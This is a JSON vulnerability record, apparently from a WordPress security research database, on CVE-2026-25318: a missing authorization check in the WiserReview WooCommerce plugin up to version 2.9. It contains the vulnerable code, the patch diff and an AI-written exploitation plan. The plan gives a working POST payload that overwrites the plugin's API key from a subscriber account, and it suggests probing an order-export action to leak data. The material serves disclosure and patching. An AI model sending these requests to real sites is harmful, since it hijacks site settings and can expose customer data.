[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-WJ_3lGCBC-wmsRJ1xYjZc-ID9ZjyqUOogBZpgtEiF8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-25318","wiserreview-product-reviews-for-woocommerce-missing-authorization","WiserReview Product Reviews for WooCommerce \u003C= 2.9 - Missing Authorization","The WiserReview Product Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","wiser-review",null,"\u003C=2.9","3.0","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-26 00:00:00","2026-05-04 15:20:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7ee6ca74-3684-46df-9b42-e97ee8cdbdb8?source=api-prod",99,[22,23,24],"assets\u002Fjs\u002Fwiserw-js.js","readme.txt","wiser-review.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-25318 (WiserReview Missing Authorization)\n\n## Vulnerability Summary\nThe WiserReview Product Reviews for WooCommerce plugin (versions \u003C= 2.9) contains a missing authorization vulnerability within its AJAX settings saving mechanism. The function `wiserrw_ajax_save_settings` is registered via the `wp_ajax_` hook but lacks any capability checks (e.g., `current_user_can('manage_options')`) or nonce verification. This allows any authenticated user, including those with Subscriber-level permissions, to overwrite the plugin's configuration options.\n\n## Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `wiserrw_save_settings`\n- **Method:** `POST`\n- **Parameters:** `wiserrw_data` (An array of settings to be saved).\n- **Required Authentication:** Subscriber-level (or any logged-in user).\n- **Vulnerability Type:** Missing Authorization and Missing CSRF Protection.\n\n## Code Flow\n1. **Entry Point:** The AJAX action is registered in `wiser-review.php`:\n   ```php\n   add_action( 'wp_ajax_wiserrw_save_settings', 'wiserrw_ajax_save_settings' );\n   ```\n2. **Vulnerable Function:** The request is handled by `wiserrw_ajax_save_settings()` in `wiser-review.php`:\n   ```php\n   function wiserrw_ajax_save_settings() {\n       \u002F\u002F No current_user_can() check here\n       \u002F\u002F No check_ajax_referer() or wp_verify_nonce() check here\n       $wiserrw_data = isset( $_POST['wiserrw_data'] ) ? array_map( 'sanitize_text_field', wp_unslash( $_POST['wiserrw_data'] ) ) : array();\n       update_option( 'wiserrw_api_settings', $wiserrw_data ); \u002F\u002F SINK: Updates global plugin settings\n\n       wp_send_json_success( array(\n           'message' => 'Settings saved.',\n           'saved'   => $wiserrw_data,\n       ) );\n   }\n   ```\n3. **Sink:** The `update_option` function writes the user-provided array directly into the database option `wiserrw_api_settings`.\n\n## Nonce Acquisition Strategy\nAnalysis of `wiserrw_ajax_save_settings()` in `wiser-review.php` shows that **no nonce is verified** on the server side. Although `wiser-review.php` localizes a nonce named `nonce` (action: `wiserrw_save_settings`) and `wiserrw_ajax_var.wiserrw_security` (action: `wiserrw_export_orders_nonce`), the actual handler for `wiserrw_save_settings` fails to check it.\n\n**Conclusion:** No nonce is required for exploitation.\n\n## Exploitation Strategy\n1. **Authentication:** Log in as a Subscriber user to obtain a session cookie.\n2. **Payload Construction:** Create a POST request with the `action` set to `wiserrw_save_settings` and `wiserrw_data` containing arbitrary configuration values.\n3. **Request Details:**\n   - **URL:** `http:\u002F\u002Flocalhost:8888\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n   - **Body:** `action=wiserrw_save_settings&wiserrw_data[wiserrw_api_key]=PWNED_API_KEY&wiserrw_data[wiserrw_live_mode_checkbox]=1`\n4. **Tool:** Use `http_request` (Playwright) to send the authenticated POST request.\n\n## Test Data Setup\n1. **User Creation:**\n   ```bash\n   wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n   ```\n2. **Initial State Check:**\n   ```bash\n   wp option get wiserrw_api_settings\n   ```\n   (Note: This might be empty or return an error if not set yet).\n\n## Expected Results\n- The server should respond with a JSON success message: `{\"success\":true,\"data\":{\"message\":\"Settings saved.\",\"saved\":{\"wiserrw_api_key\":\"PWNED_API_KEY\",\"wiserrw_live_mode_checkbox\":\"1\"}}}`.\n- The `wiserrw_api_settings` option in the WordPress database will be updated with the malicious values.\n\n## Verification Steps\n1. **Database Check:** Run the following WP-CLI command to verify the option was changed:\n   ```bash\n   wp option get wiserrw_api_settings --format=json\n   ```\n   Expect output: `{\"wiserrw_api_key\":\"PWNED_API_KEY\",\"wiserrw_live_mode_checkbox\":\"1\"}`.\n\n## Alternative Approaches\nIf the plugin validates the keys within the `wiserrw_data` array (though the source code doesn't show this), attempt to use existing keys identified from the plugin's frontend or JS:\n- `wiserrw_product_review_enabled`\n- `wiserrw_product_card_enabled`\n- `wiserrw_duration`\n\nIf the `wiserrw_export_orders` action also lacks authorization, it could be used to leak order information. That function is mentioned in the JS:\n- **Action:** `wiserrw_export_orders`\n- **Security Check:** `wiserrw_security` (Nonce action: `wiserrw_export_orders_nonce`).\n- **Strategy:** If this handler also lacks `current_user_can`, find where `wiserrw_export_orders_nonce` is exposed (likely the admin settings page), extract it via `browser_eval`, and trigger an export. However, the primary target is the settings overwrite as it is a direct \"Missing Authorization\" on a critical function.","The WiserReview Product Reviews for WooCommerce plugin (up to version 2.9) fails to implement capability checks or nonce verification in its AJAX settings saving handler. This allows any authenticated user, including those with low-level Subscriber permissions, to overwrite the plugin's global configuration and API settings.","\u002F\u002F wiser-review.php:59\nfunction wiserrw_ajax_save_settings() {\n\t$wiserrw_data = isset( $_POST['wiserrw_data'] ) ? array_map( 'sanitize_text_field', wp_unslash( $_POST['wiserrw_data'] ) ) : array();\n\tupdate_option( 'wiserrw_api_settings', $wiserrw_data );\n\n\twp_send_json_success( array(\n\t\t'message' => 'Settings saved.',\n\t\t'saved'   => $wiserrw_data,\n\t) );\n}\nadd_action( 'wp_ajax_wiserrw_save_settings', 'wiserrw_ajax_save_settings' );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F2.9\u002Fassets\u002Fjs\u002Fwiserw-js.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F3.0\u002Fassets\u002Fjs\u002Fwiserw-js.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F2.9\u002Fassets\u002Fjs\u002Fwiserw-js.js\t2025-10-16 20:08:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F3.0\u002Fassets\u002Fjs\u002Fwiserw-js.js\t2026-02-03 06:00:56.000000000 +0000\n@@ -105,7 +105,7 @@\n         $.ajax({\n             type : 'POST',\n             url : ajaxurl,\n-            data : $form.serialize() + '&action=wiserrw_save_settings',\n+            data : $form.serialize() + '&action=wiserrw_save_settings&nonce=' + wiserrw_ajax_var.nonce,\n             success: function (res) {\n                 const $toggle = $current_chek.closest('.wiserrw_toggle');\n                 let $msg = $toggle.find('.wiserrw_saved_msg');\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F2.9\u002Fwiser-review.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F3.0\u002Fwiser-review.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F2.9\u002Fwiser-review.php\t2025-11-19 14:08:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F3.0\u002Fwiser-review.php\t2026-02-03 06:00:56.000000000 +0000\n@@ -57,6 +57,20 @@\n add_action( 'admin_enqueue_scripts', 'wiserrw_scripts' );\n \n function wiserrw_ajax_save_settings() {\n+\t\u002F\u002F Verify nonce for security\n+\tif ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'wiserrw_save_settings' ) ) {\n+\t\twp_send_json_error( array(\n+\t\t\t'message' => 'Security check failed.',\n+\t\t), 403 );\n+\t}\n+\n+\t\u002F\u002F Check user capabilities\n+\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\twp_send_json_error( array(\n+\t\t\t'message' => 'Unauthorized access.',\n+\t\t), 403 );\n+\t}\n+\n \t$wiserrw_data = isset( $_POST['wiserrw_data'] ) ? array_map( 'sanitize_text_field', wp_unslash( $_POST['wiserrw_data'] ) ) : array();\n \tupdate_option( 'wiserrw_api_settings', $wiserrw_data );","To exploit this vulnerability, an attacker first logs into the WordPress site with any authenticated account (e.g., a Subscriber). They then issue a POST request to the `\u002Fwp-admin\u002Fadmin-ajax.php` endpoint with the `action` parameter set to `wiserrw_save_settings`. The payload should include a `wiserrw_data` array containing malicious configuration values, such as a custom `wiserrw_api_key`. Since the server-side function `wiserrw_ajax_save_settings` does not check for user capabilities or verify a security nonce, the plugin's global option `wiserrw_api_settings` will be updated with the attacker-supplied data, effectively hijacking the plugin's connection to the WiserReview platform.","gemini-3-flash-preview","2026-05-05 00:17:54","2026-05-05 00:18:16",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","2.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwiser-review\u002Ftags\u002F2.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwiser-review.2.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwiser-review\u002Ftags\u002F3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwiser-review.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwiser-review\u002Ftags"]